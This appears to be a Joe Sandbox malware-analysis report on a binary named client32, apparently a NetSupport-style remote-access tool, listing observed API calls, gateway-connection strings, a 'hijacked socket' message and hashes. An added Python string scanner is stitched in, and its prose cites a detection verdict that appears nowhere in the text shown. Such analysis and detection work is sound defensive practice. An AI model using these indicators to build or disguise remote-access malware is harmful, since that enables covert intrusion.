6ca973b8-6ca973cc call 6ca86f50 980->984 985 6ca973cf-6ca973ed call 6ca85f20 call 6ca85e90 980->985 981->980 984->985 993 6ca973ef 985->993 994 6ca973f5-6ca973f7 985->994 993->994 995 6ca973f9-6ca97407 call 6ca9dbd0 994->995 996 6ca97425-6ca97447 GetModuleFileNameA call 6ca82420 994->996 1003 6ca97409-6ca9741c call 6ca84580 995->1003 1004 6ca9741e 995->1004 1001 6ca97449-6ca9744a 996->1001 1002 6ca9744c 996->1002 1005 6ca97451-6ca9746d 1001->1005 1002->1005 1007 6ca97420 1003->1007 1004->1007 1008 6ca97470-6ca9747f 1005->1008 1007->996 1008->1008 1010 6ca97481-6ca97486 1008->1010 1011 6ca97487-6ca9748d 1010->1011 1011->1011 1012 6ca9748f-6ca974c8 GetPrivateProfileIntA GetModuleHandleA 1011->1012 1013 6ca974ce-6ca974fa call 6ca85e90 * 2 1012->1013 1014 6ca97563-6ca9758f CreateMutexA timeBeginPeriod 1012->1014 1019 6ca974fc-6ca97511 call 6ca85e90 1013->1019 1020 6ca97536-6ca9755d call 6ca85e90 * 2 1013->1020 1025 6ca9752a-6ca97530 1019->1025 1026 6ca97513-6ca97528 call 6ca85e90 1019->1026 1020->1014 1025->1020 1026->1020 1026->1025
APIs
  • Part of subcall function 6CA82A90: GetModuleFileNameA.KERNEL32(00000000,?,00000100), ref: 6CA82ACB
  • Part of subcall function 6CA82A90: _strrchr.LIBCMT ref: 6CA82ADA
  • Part of subcall function 6CA82A90: _strrchr.LIBCMT ref: 6CA82AEA
  • Part of subcall function 6CA82A90: wsprintfA.USER32 ref: 6CA82B05
  • Part of subcall function 6CA9DBD0: _malloc.LIBCMT ref: 6CA9DBE9
  • Part of subcall function 6CA9DBD0: wsprintfA.USER32 ref: 6CA9DC04
  • Part of subcall function 6CA9DBD0: _memset.LIBCMT ref: 6CA9DC27
• LoadLibraryA.KERNEL32(WinInet.dll), ref: 6CA97057
• InitializeCriticalSection.KERNEL32(6CACB898), ref: 6CA970DF
• CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 6CA970EF
• CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 6CA97115
• CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 6CA9713B
• WSAStartup.WSOCK32(00000101,6CACB91A), ref: 6CA97167
• _malloc.LIBCMT ref: 6CA971A3
  • Part of subcall function 6CAA1B69: __FF_MSGBANNER.LIBCMT ref: 6CAA1B82
  • Part of subcall function 6CAA1B69: __NMSG_WRITE.LIBCMT ref: 6CAA1B89
  • Part of subcall function 6CAA1B69: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,6CAAD3C1,6CAA6E81,00000001,6CAA6E81,?,6CAAF447,00000018,6CAC7738,0000000C,6CAAF4D7), ref: 6CAA1BAE
• _memset.LIBCMT ref: 6CA971D3
• _calloc.LIBCMT ref: 6CA97214
• _malloc.LIBCMT ref: 6CA9728B
• _memset.LIBCMT ref: 6CA972C1
• _malloc.LIBCMT ref: 6CA972CD
• _memset.LIBCMT ref: 6CA97303
• GetTickCount.KERNEL32 ref: 6CA97361
• CreateThread.KERNEL32(00000000,00004000,6CA96BA0,00000000,00000000,6CACBACC), ref: 6CA9737E
• SetThreadPriority.KERNEL32(00000000,00000001), ref: 6CA973AC
• GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\Support\,00000104), ref: 6CA97430
• GetPrivateProfileIntA.KERNEL32(htctl.packet_tracing,mode,00000000,C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\Support\pci.ini), ref: 6CA974B0
• GetModuleHandleA.KERNEL32(nsmtrace), ref: 6CA974C0
• CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 6CA97566
• timeBeginPeriod.WINMM(00000001), ref: 6CA97573
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2531364826.000000006CA81000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CA80000, based on PE: true
• Associated: 0000000A.00000002.2531301355.000000006CA80000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000000A.00000002.2532853143.000000006CAC0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000000A.00000002.2533142363.000000006CAC9000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 0000000A.00000002.2533215163.000000006CACA000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 0000000A.00000002.2533215163.000000006CACE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 0000000A.00000002.2533383758.000000006CAD0000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_6ca80000_client32.jbxd
Yara matches
Similarity
• API ID: Create$_malloc_memset$EventModule$FileNameThread_strrchrwsprintf$AllocateBeginCountCriticalHandleHeapInitializeLibraryLoadMutexPeriodPriorityPrivateProfileSectionStartupTick_calloctime
• String ID: (iflags & CTL_REMOTE) == 0$*CMPI$*DisconnectTimeout$0/su$358075$C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\Support\$C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\Support\pci.ini$General$HTCTL32$NSM303008$NetworkSpeed$Support\$Trace$TraceFile$TraceRecv$TraceSend$WinInet.dll$_debug$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c$htctl.packet_tracing$mode$nsmtrace$pci.ini$sv.ResumeEvent$sv.gateways$sv.hRecvThread$sv.hRecvThreadReadyEvent$sv.hResponseEvent$sv.s$sv.subset.omit$sv.subset.subset
• API String ID: 3160247386-2525493421
• Opcode ID: d787df4b9ef540ebe592d12303e56b1f90b0f73a378fb0676cbc2f120e09f35d
• Instruction ID: 711667c537b1a59ab67a2f49a43559f30f25b5be86bcca2c97dcf3029bf0ee10
• Opcode Fuzzy Hash: d787df4b9ef540ebe592d12303e56b1f90b0f73a378fb0676cbc2f120e09f35d
• Instruction Fuzzy Hash: 42D1F8B0B10305AFE714AF689DC995676F8BB0530CB048A29F509D7B01E731D9C98BB2

Control-flow Graph (graph image not reproduced; it marks each basic block as executed or not executed): function at 0x11029BB0, basic blocks 0x11029BB0-0x1102A1E3, calling LoadLibraryA, GetProcAddress (repeatedly), SetLastError, GetLastError, InternetOpenA, InternetConnectA, GetDesktopWindow and FreeLibrary.
APIs
• LoadLibraryA.KERNEL32(WinInet.dll,1EF76653,757323A0,?,00000000), ref: 11029BE5
• GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 11029C7F
• SetLastError.KERNEL32(00000078), ref: 11029C93
• _malloc.LIBCMT ref: 11029CB7
• GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 11029CD1
• GetLastError.KERNEL32 ref: 11029CF2
• _free.LIBCMT ref: 11029CFE
• _malloc.LIBCMT ref: 11029D07
• GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 11029D21
• GetProcAddress.KERNEL32(?,InternetOpenA), ref: 11029D5B
• InternetOpenA.WININET(11195264,?,?,000000FF,00000000), ref: 11029D7A
• SetLastError.KERNEL32(00000078), ref: 11029D84
• SetLastError.KERNEL32(00000078), ref: 11029D91
• SetLastError.KERNEL32(00000078), ref: 11029D9B
• _free.LIBCMT ref: 11029DA5
  • Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ABB
  • Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD
• GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 11029E25
• SetLastError.KERNEL32(00000078), ref: 11029E3E
• GetProcAddress.KERNEL32(?,InternetConnectA), ref: 11029E51
• InternetConnectA.WININET(000000FF,1119A6C0,00000050,00000000,00000000,00000003,00000000,00000000), ref: 11029E6E
• GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 11029E8A
• SetLastError.KERNEL32(00000078), ref: 11029EA3
• GetProcAddress.KERNEL32(?,HttpOpenRequestA), ref: 11029EC9
• GetProcAddress.KERNEL32(?,HttpSendRequestA), ref: 11029F1D
• GetProcAddress.KERNEL32(?,InternetQueryDataAvailable), ref: 1102A083
• SetLastError.KERNEL32(00000078), ref: 1102A150
• GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 1102A1A2
• SetLastError.KERNEL32(00000078), ref: 1102A1B9
• FreeLibrary.KERNEL32(?), ref: 1102A1CA
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: AddressProc$ErrorLast$FreeInternetLibrary_free_malloc$ConnectHeapLoadOpen
• String ID: ://$GET$HttpOpenRequestA$HttpQueryInfoA$HttpSendRequestA$InternetCloseHandle$InternetConnectA$InternetErrorDlg$InternetOpenA$InternetQueryDataAvailable$InternetQueryOptionA$WinInet.dll
• API String ID: 921868004-913974648
• Opcode ID: 672cd097590bfd03c9fe4a36dbc9c03aeb2e34a222513bbefa7f0796f77ae97c
• Instruction ID: fedf281c9ee5d08c3a8f43e513d3e5c088d5a5ed6dab1fd82504b865b87691ba
• Opcode Fuzzy Hash: 672cd097590bfd03c9fe4a36dbc9c03aeb2e34a222513bbefa7f0796f77ae97c
• Instruction Fuzzy Hash: 8012AC70D40229DBEB11DFE5CC88AAEFBF8FF88754F604169E425A7600EB745980CB60
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 11145A70: GetLastError.KERNEL32(?,00000000,000000FF,?), ref: 11145AA5
                                                                                                                                                      • Part of subcall function 11145A70: Sleep.KERNEL32(000000C8,?,?,?,?,?,?,00000000,000000FF,?), ref: 11145AB5
                                                                                                                                                    • _fgets.LIBCMT ref: 110628E2
                                                                                                                                                    • _strpbrk.LIBCMT ref: 11062949
                                                                                                                                                    • _fgets.LIBCMT ref: 11062A4C
                                                                                                                                                    • _strpbrk.LIBCMT ref: 11062AC3
                                                                                                                                                    • __wcstoui64.LIBCMT ref: 11062ADC
                                                                                                                                                    • _fgets.LIBCMT ref: 11062B55
                                                                                                                                                    • _strpbrk.LIBCMT ref: 11062B7B
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                     • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                     • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                     • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                     • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                     • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                     • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                     • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                     • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                     • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                     • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                     • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                     • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                     • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _fgets_strpbrk$ErrorLastSleep__wcstoui64
                                                                                                                                                    • String ID: %c%04d%s$%s.%04d.%s$/- $?expirY$?starT$ACM$Client$Expired$_License$_checksum$_include$_version$cd_install$defaults$enforce$expiry$inactive$licensee$product$shrink_wrap$start
                                                                                                                                                    • API String ID: 716802716-1571441106
                                                                                                                                                    • Opcode ID: 742ea8bdf19e8cca6d5bd37e3cbea73eeb9325f4fe67667d5bccebbacef3dcd8
                                                                                                                                                    • Instruction ID: a72cdd11ea0a2970362cd59f127853d680cd45206dcb20ec64d0abc9fb05f950
                                                                                                                                                    • Opcode Fuzzy Hash: 742ea8bdf19e8cca6d5bd37e3cbea73eeb9325f4fe67667d5bccebbacef3dcd8
                                                                                                                                                    • Instruction Fuzzy Hash: 7DA2C475E0465A9FEB11CF64DC40BEFB7B8AF44345F0441D8E849AB280EB71AA45CF91

                                                                                                                                                     Control-flow Graph
                                                                                                                                                     • Graph image not reproduced (legend: Executed / Not Executed). Entry block 6ca8a980, basic blocks through 6ca8ae92; internal calls into 6ca85840, 6ca8a5c0, 6ca87610, 6ca88fb0, 6caa0ef0, 6ca830a0 and 6caa28e1; Winsock path socket, setsockopt (#21, three times), bind, htons, WSASetBlockingHook, getsockname, with WSAGetLastError, WSAUnhookBlockingHook and closesocket on the error edges; critical-section enter/leave around the shared state and GetTickCount / InterlockedExchange on the success exit.
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 6CA85840: inet_ntoa.WSOCK32(00000080,?,00000000,?,6CA88F91,00000000,00000000,6CACB8DA,?,00000080), ref: 6CA85852
                                                                                                                                                    • EnterCriticalSection.KERNEL32(6CACB898,?,00000000,00000000), ref: 6CA8AA11
                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6CACB898), ref: 6CA8AA58
                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6CACB898), ref: 6CA8AA68
                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6CACB898), ref: 6CA8AA94
                                                                                                                                                    • WSAGetLastError.WSOCK32(?,?,?,?,?,00000000,00000000), ref: 6CA8AB0B
                                                                                                                                                     • socket.WSOCK32(00000002,00000001,00000000,?,00000000,00000000), ref: 6CA8AB4E (AF_INET, SOCK_STREAM)
                                                                                                                                                     • WSAGetLastError.WSOCK32(00000002,00000001,00000000,?,00000000,00000000), ref: 6CA8AB5A
                                                                                                                                                     • #21.WSOCK32(00000000,0000FFFF,00001001,?,00000004,00000002,00000001,00000000,?,00000000,00000000), ref: 6CA8AB8E (WSOCK32 ordinal 21 is setsockopt; level 0xFFFF = SOL_SOCKET, option 0x1001 = SO_SNDBUF, optlen 4)
                                                                                                                                                     • #21.WSOCK32(00000000,0000FFFF,00000080,?,00000004,00000000,0000FFFF,00001001,?,00000004,00000002,00000001,00000000,?,00000000,00000000), ref: 6CA8ABB1 (setsockopt; SOL_SOCKET, option 0x0080 = SO_LINGER, optlen 4)
                                                                                                                                                     • #21.WSOCK32(00000000,00000006,00000001,?,00000004,00000002,00000001,00000000,?,00000000,00000000), ref: 6CA8ABE3 (setsockopt; level 6 = IPPROTO_TCP, option 1 = TCP_NODELAY, which matches the *TcpNoDelay string below)
                                                                                                                                                    • bind.WSOCK32(00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6CA8AC18
                                                                                                                                                    • WSAGetLastError.WSOCK32(00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6CA8AC21
                                                                                                                                                    • closesocket.WSOCK32(00000000,00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6CA8AC29
                                                                                                                                                    • htons.WSOCK32(00000000,00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6CA8AC65
                                                                                                                                                    • WSASetBlockingHook.WSOCK32(6CA863A0,00000000,00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6CA8AC76
                                                                                                                                                    • WSAGetLastError.WSOCK32(00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6CA8AC8F
                                                                                                                                                    • WSAUnhookBlockingHook.WSOCK32(00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6CA8AC96
                                                                                                                                                    • closesocket.WSOCK32(00000000,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6CA8AC9C
                                                                                                                                                    • WSAGetLastError.WSOCK32(?,?,?,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6CA8ACFD
                                                                                                                                                    • WSAUnhookBlockingHook.WSOCK32(?,?,?,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6CA8AD04
                                                                                                                                                    • closesocket.WSOCK32(00000000,?,?,?,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6CA8AD0A
                                                                                                                                                    • WSAUnhookBlockingHook.WSOCK32(00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6CA8AD45
                                                                                                                                                    • EnterCriticalSection.KERNEL32(6CACB898,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6CA8AD4F
                                                                                                                                                    • InitializeCriticalSection.KERNEL32(-6CACCB4A), ref: 6CA8ADE6
                                                                                                                                                      • Part of subcall function 6CA88FB0: _memset.LIBCMT ref: 6CA88FE4
                                                                                                                                                      • Part of subcall function 6CA88FB0: getsockname.WSOCK32(?,?,00000010,?,03822CB0,?), ref: 6CA89005
                                                                                                                                                    • getsockname.WSOCK32(00000000,?,?), ref: 6CA8AE4B
                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6CACB898), ref: 6CA8AE60
                                                                                                                                                    • GetTickCount.KERNEL32 ref: 6CA8AE6C
                                                                                                                                                    • InterlockedExchange.KERNEL32(?,00000000), ref: 6CA8AE7A
                                                                                                                                                    Strings
                                                                                                                                                    • Cannot connect to gateway %s via web proxy, error %d, xrefs: 6CA8AD14
                                                                                                                                                    • Connect error to %s using hijacked socket, error %d, xrefs: 6CA8AB17
                                                                                                                                                    • *TcpNoDelay, xrefs: 6CA8ABB8
                                                                                                                                                    • Cannot connect to gateway %s, error %d, xrefs: 6CA8ACA6
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2531364826.000000006CA81000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                                                                     • Associated: 0000000A.00000002.2531301355.000000006CA80000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                     • Associated: 0000000A.00000002.2532853143.000000006CAC0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                     • Associated: 0000000A.00000002.2533142363.000000006CAC9000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                     • Associated: 0000000A.00000002.2533215163.000000006CACA000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                     • Associated: 0000000A.00000002.2533215163.000000006CACE000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                     • Associated: 0000000A.00000002.2533383758.000000006CAD0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_6ca80000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CriticalSection$ErrorLast$BlockingHookLeave$Unhookclosesocket$Entergetsockname$CountExchangeInitializeInterlockedTick_memsetbindhtonsinet_ntoasocket
                                                                                                                                                    • String ID: *TcpNoDelay$Cannot connect to gateway %s via web proxy, error %d$Cannot connect to gateway %s, error %d$Connect error to %s using hijacked socket, error %d
                                                                                                                                                    • API String ID: 692187944-2561115898
                                                                                                                                                    • Opcode ID: 8cdae3489ee2218474cab7370964292b630f331d07c86f03fdc241ed364896df
                                                                                                                                                    • Instruction ID: a27d9a6fc5a351437806ab4f2e56c4e7d984fa4c0113d44211d4b5c675d6a4f2
                                                                                                                                                    • Opcode Fuzzy Hash: 8cdae3489ee2218474cab7370964292b630f331d07c86f03fdc241ed364896df
                                                                                                                                                    • Instruction Fuzzy Hash: FCE1A271A01219AFDB14DF94D980BEDB3B5FF48304F1041AAE909A7680DB349EC98BA1
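The four strings under this function (the three gateway-connection error messages and *TcpNoDelay) are the kind of static indicator a detection engineer lifts from a report like this one, and the report's own "Malicious sample detected (through community Yara rule)" verdict rests on exactly that sort of string match. The block below is an added example, not code from the Joe Sandbox report or from NetSupport: a small Python scanner that applies an N-of-M, ASCII-or-wide string condition over a buffer the way a YARA rule with `ascii wide` strings and `2 of them` would. Only the four byte strings are taken from the report; the threshold of two distinct strings and the sample dump are assumptions constructed for the demonstration.

```python
"""Added example, not code from the Joe Sandbox report or from NetSupport.

Scans a memory dump or unpacked PE for the gateway-connection strings that
function 6ca8a980 references and applies an N-of-M condition the way a YARA
rule with `ascii wide` strings and `2 of them` would.  The byte strings come
from the report; the threshold and the sample buffer are constructed here.
"""
from typing import Dict, List, Tuple

# Strings listed under function 6ca8a980 in the report.
GATEWAY_STRINGS: List[bytes] = [
    b"Cannot connect to gateway %s via web proxy, error %d",
    b"Cannot connect to gateway %s, error %d",
    b"Connect error to %s using hijacked socket, error %d",
    b"*TcpNoDelay",
]


def variants(pattern: bytes) -> List[Tuple[str, bytes]]:
    """ASCII and UTF-16LE forms of a pattern (YARA's `ascii wide` modifiers)."""
    return [("ascii", pattern),
            ("wide", pattern.decode("ascii").encode("utf-16-le"))]


def find_all(buf: bytes, needle: bytes) -> List[int]:
    """Every (possibly overlapping) offset of needle in buf."""
    offsets, start = [], buf.find(needle)
    while start != -1:
        offsets.append(start)
        start = buf.find(needle, start + 1)
    return offsets


def scan(buf: bytes, patterns: List[bytes] = GATEWAY_STRINGS,
         min_distinct: int = 2) -> Dict:
    """Report which patterns hit, where, and whether the N-of-M condition holds.

    min_distinct counts distinct patterns rather than total occurrences, so one
    string repeated many times cannot satisfy the condition by itself (the same
    semantics as YARA's `N of them`).
    """
    hits: Dict[str, List[Tuple[str, int]]] = {}
    for pat in patterns:
        for kind, needle in variants(pat):
            for off in find_all(buf, needle):
                hits.setdefault(pat.decode("ascii"), []).append((kind, off))
    return {"matched": len(hits) >= min_distinct, "hits": hits}


# Constructed sample (assumption, not a real dump): filler bytes with one ASCII
# string and one UTF-16LE string embedded.
SAMPLE_DUMP = (
    b"\x00" * 16
    + b"Cannot connect to gateway %s, error %d\x00"
    + b"\x90" * 8
    + "*TcpNoDelay".encode("utf-16-le")
    + b"\x00" * 4
)

if __name__ == "__main__":
    result = scan(SAMPLE_DUMP)
    for name, where in result["hits"].items():
        print(f"{name!r}: {where}")
    print("rule matched:", result["matched"])
```

Run it against the memory dumps the report links for this module (the 6CA80000 region) rather than the sample on disk if the loader packs or encrypts strings; the counts-distinct rule is what keeps a buffer that merely repeats *TcpNoDelay from firing.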

                                                                                                                                                     Control-flow Graph
                                                                                                                                                     • Graph image not reproduced (legend: Executed / Not Executed). Entry block 11139ed0, basic blocks through 1113a5b5; window handling via IsWindow, IsWindowVisible, IsIconic, FindWindowA (Shell_TrayWnd), GetForegroundWindow, EnableWindow and SetForegroundWindow, with GetCurrentThreadId at entry and GetLastError, GetTickCount and FreeLibrary on the later paths; many internal calls (11139a70, 11147060, 1105e820, 11132120, 11143e00 and others) interleave with the USER32 calls.
APIs
• GetCurrentThreadId.KERNEL32 ref: 11139F07
• IsWindow.USER32(000A0036), ref: 11139F65
• IsWindowVisible.USER32(000A0036), ref: 11139F73
• IsWindowVisible.USER32(000A0036), ref: 11139FAB
• GetForegroundWindow.USER32 ref: 11139FC6
• EnableWindow.USER32(000A0036,00000000), ref: 11139FE0
• EnableWindow.USER32(000A0036,00000001), ref: 11139FFC
• SetForegroundWindow.USER32(00000000), ref: 1113A00B
• FindWindowA.USER32(Shell_TrayWnd,00000000), ref: 1113A049
• IsWindowVisible.USER32(00000000), ref: 1113A058
• IsWindowVisible.USER32(000A0036), ref: 1113A088
• IsIconic.USER32(000A0036), ref: 1113A095
• GetForegroundWindow.USER32 ref: 1113A09F
  • Part of subcall function 11132120: ShowWindow.USER32(000A0036,00000000,?,11139EA2,00000007,?,?,?,?,?,00000000), ref: 11132144
  • Part of subcall function 11132120: ShowWindow.USER32(000A0036,11139EA2,?,11139EA2,00000007,?,?,?,?,?,00000000), ref: 11132156
• SetForegroundWindow.USER32(00000000), ref: 1113A0C5
• EnableWindow.USER32(000A0036,00000001), ref: 1113A0D4
• GetLastError.KERNEL32 ref: 1113A193
• GetLastError.KERNEL32 ref: 1113A20B
• GetTickCount.KERNEL32 ref: 1113A4B8
• GetTickCount.KERNEL32 ref: 1113A4D9
  • Part of subcall function 110261A0: LoadLibraryA.KERNEL32(Wtsapi32.dll,00000000,1113A522), ref: 110261A8
• FreeLibrary.KERNEL32(?,00000000,000000FF,00000000,00000001,00000000,00000001,00000000,0000000A,?,00000000), ref: 1113A574
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: Window$ForegroundVisible$Enable$CountErrorLastLibraryShowTick$CurrentFindFreeIconicLoadThread
• String ID: Audio$Client$File <%s> doesnt exist, e=%d$HideWhenIdle$HookDirectSound$MainWnd = %08x, visible %d, valid %d$NeedsReinstall$Reactivate main window$Shell_TrayWnd$ShowNeedsReinstall in 15, user=%s$disableRunplugin
• API String ID: 2511061093-2542869446
• Opcode ID: e14826bbac3d3f7ee8e0918d09fc5866bd4c7377ec69909a935bcd746c51be63
• Instruction ID: 9ececd2581658abecd2b9d282a3ee437682ea2591524154b6e9732358788741a
• Opcode Fuzzy Hash: e14826bbac3d3f7ee8e0918d09fc5866bd4c7377ec69909a935bcd746c51be63
• Instruction Fuzzy Hash: FC023675E11226DFE716DFA4DD94BAAFB65BBC131EF140138E4219728CEB30A844CB91

Control-flow Graph
(graph of the function at 11134830-11134BAF; rendered edge list and executed/not-executed legend omitted. Blocks call GetLocalTime, LoadLibraryA, GetCurrentProcess, GetProcAddress, GetProcessHandleCount, SetLastError, K32GetProcessMemoryInfo and FreeLibrary.)
APIs
  • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
• GetLocalTime.KERNEL32(?,_debug,CheckLeaks,00000001,00000000,1EF76653), ref: 1113489E
• LoadLibraryA.KERNEL32(psapi.dll), ref: 111348F6
• GetCurrentProcess.KERNEL32 ref: 11134937
• GetProcAddress.KERNEL32(?,GetProcessHandleCount), ref: 11134961
• GetProcessHandleCount.KERNEL32(00000000,?), ref: 11134972
• SetLastError.KERNEL32(00000078), ref: 11134978
• GetProcAddress.KERNEL32(?,GetGuiResources), ref: 11134994
• GetProcAddress.KERNEL32(?,GetGuiResources), ref: 111349BC
• SetLastError.KERNEL32(00000078), ref: 111349D9
• SetLastError.KERNEL32(00000078), ref: 111349E6
• GetProcAddress.KERNEL32(?,GetProcessMemoryInfo), ref: 111349F8
